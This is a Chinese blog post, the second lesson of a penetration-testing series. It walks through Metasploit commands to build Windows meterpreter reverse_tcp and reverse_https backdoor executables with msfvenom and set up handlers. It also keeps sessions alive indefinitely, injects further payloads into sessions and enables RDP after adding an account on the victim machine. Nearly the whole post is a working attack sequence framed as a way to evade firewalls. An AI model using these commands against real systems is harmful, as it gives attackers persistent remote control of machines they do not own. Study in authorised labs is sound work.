注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

熊猫正正的博客

熊猫正正的天空

 
 
 

日志

 
 

Linux顶级渗透精髓--第二课 Meatsploit Irregular Excute Backdoor To Paylode Inject Session  

2014-12-10 20:19:45|  分类: web安全渗透 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
Meatsploit Irregular Excute Backdoor To Paylode Inject Session

定义端口Port:40000-40012

获得后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.40.129 LPORT=40000 -f exe > tcp.exe

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.40.129
set LPORT 40000
exploit

background

session -i

Reverse_https And Reverse_http  秒杀防火墙,类似远程控制,断开接连可以重连
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.40.129 LPORT=40001 -f exe > https.exe

back

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
show options
set LPORT 40001
show options

show advanced    高级配置

将SessionCommunicationTimeout 设置为 0 , 代表会话永远过期,保持会话连接
将ExitOnSession 设置为false , 保持会话存活

set SessionCommunicationTimeout 0

exploit

meterpreter>
sysinfo

background

sessions

sessions -k id(会话id号)

sessions 

断开https之后,再输入exploit,可以重新连上

exploit


Payload Inject  射入载荷

use post/windows/manage/payload_inject

set HANDLER true

set LHOST 192.168.40.129

set LPORT 40003

set PAYLOAD windows/meterpreter/reverse_https

sessions

set SESSION 2

exploit

sessions

sessions -i 3

background


Auto Rdp Port 利用方式:自动化开3389,也可以开任意端口,先得到用户和密码

use post/windows/manage/enable_rdp
show options

被攻击XP上添加帐号
net user test test /add

set USERNAME test
set PASSWORD test
set SESSION 1
exploit

nc -v 192.168.40.129 3389
  评论这张
 
阅读(77)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017